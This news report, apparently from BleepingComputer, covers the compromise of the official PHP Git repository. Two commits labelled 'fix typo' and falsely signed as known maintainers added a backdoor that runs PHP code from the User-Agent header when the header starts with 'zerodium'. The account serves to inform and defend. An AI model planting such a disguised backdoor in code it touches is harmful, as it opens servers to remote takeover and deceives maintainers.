 In the latest software supply chain attack, the official PHP Git repository was hacked and the code base tampered with.
Yesterday, two malicious commits were pushed to the php-src Git repository maintained by the PHP team on their git.php.net server.
The threat actors had signed off on these commits as if these were made by known PHP developers and maintainers, Rasmus Lerdorf and Nikita Popov.
RCE backdoor planted on PHP Git server
In an attempt to compromise the PHP code base, two malicious commits were pushed to the official PHP Git repository yesterday.
The incident is alarming considering PHP remains the server-side programming language to power over 79% of the websites on the Internet.
In the malicious commits [1, 2] seen by BleepingComputer, the attackers published a mysterious change upstream, "fix typo" under the pretense this was a minor typographical correction.
However, taking a look at the added line 370 where zend_eval_string function is called, the code actually plants a backdoor for obtaining easy Remote Code Execution (RCE) on a website running this hijacked version of PHP.
"This line executes PHP code from within the useragent HTTP header, if the string starts with 'zerodium'," responded PHP developer Jake Birchall to Michael VoÅ™ÃÅ¡ek, who had first pointed out the anomaly.
bleepingcomputer.com |
No Comments